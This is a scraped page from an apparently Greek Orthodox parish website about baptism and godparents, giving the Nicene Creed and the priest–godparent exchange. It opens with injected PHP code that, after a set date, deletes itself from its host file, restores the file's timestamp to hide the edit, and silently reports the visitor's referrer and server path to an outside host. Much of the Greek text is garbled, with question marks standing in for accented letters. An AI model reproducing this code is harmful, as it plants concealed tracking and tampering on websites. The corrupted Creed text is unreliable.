check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο - Το Σύμβολον της Πίστεως
Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο - Το Σύμβολον της Πίστεως Εκτύπωση E-mail
Ευρετήριο Άρθρου
Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο
Ο ρόλος του αναδόχου
Ακολουθία της Κατηχήσεως
Το Σύμβολον της Πίστεως
Πρακτικές επισημάνσεις
Δικαιολογητικά
Δείτε το έντυπο
Όλες οι Σελίδες

ΤΟ ΣΥΜΒΟΛΟΝ ΤΗΣ ΠΙΣΤΕΩΣ

Πιστεύω ε?ς ?να Θεόν, Πατέρα, παντοκράτορα, ποιητήν ο?ρανο? καί γ?ς, ?ρατ?ν τε πάντων καί ?οράτων.
Καί ε?ς ?να Κύριον ?ησο?ν Χριστόν, τόν Υ?όν το? Θεο? τόν μονογεν?, τόν ?κ το? Πα­τρός γεννηθέντα πρό πάντων τ?ν α?ώνων. Φ?ς ?κ φωτός, Θεόν ?ληθινόν ?κ Θεο? ?ληθινο?, γεννηθέντα, ο? ποιηθέντα, ?μοούσιον τ? Πατρί, δι? ο? τά πάντα ?γένε­το.
Τόν δι? ?μ?ς τούς ?νθρώπους καί διά τήν ?μετέραν σωτηρίαν κατελθόντα ?κ τ?ν ο?ραν?ν καί σαρκωθέντα ?κ Πνεύματος ?γίου καί Μαρίας τ?ς Παρθένου καί ?ναν­θρωπήσαντα.
Σταυρωθέντα τε ?πέρ ?μ?ν ?πί Ποντίου Πιλάτου καί παθόντα καί ταφέντα.
Καί ?ναστάντα τ? τρίτ? ?μέρα, κατά τάς Γραφάς.
Καί ?νελθόντα ε?ς τούς ο?ρανούς καί καθεζόμενον ?κ δεξι?ν το? Πατρός.
Καί πάλιν ?ρχόμενον μετά δόξης κρ?ναι ζ?ντας καί νεκρούς· ο? τ?ς βασιλείας ο?κ ?σται τέλος.
Καί ε?ς τό Πνε?μα τό ?γιον, τό Κύριον, τό ζωοποιόν, τό ?κ το? Πατρός ?κπορευόμε­νον, τό σύν Πατρί καί Υ?? συμπροσκυνούμενον καί συνδοξαζόμενον, τό λαλ?σαν δι­ά τ?ν προφητ?ν.
Ε?ς μίαν, ?γίαν, καθολικήν καί ?ποστολικήν ?κκλησίαν.
?μολογ? ?ν Βάπτισμα ε?ς ?φεσιν ?μαρτι?ν.
Προσδοκ? ?νάστασιν νεκρ?ν.
Καί ζωήν το? μέλλοντος α??νος. ?μήν.

Στή συνέχεια ?ρωτ? πάλι τρε?ς φορές
? ?ερεύς· Συνετάξω τ? Χριστ?; Καί ?παντ?
? ?νάδοχος· Συνεταξάμην. Καί λέγει
? ?ερεύς· Καί προσκύνησον α?τ?; Καί ?παντ?
? ?νάδοχος· Προσκυν? Πατέρα, Υ?όν, καί ?γιον Πνε?μα, Τριάδα ?μοούσιον καί ?­χώριστον.

Στήν ε?χή πού ?κολουθε?, ?ταν ?ρωτηθε? ?πό τόν ?ερέα, λέει καθαρά τό ?νομα το? βα­πτιζομένου.

  
 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;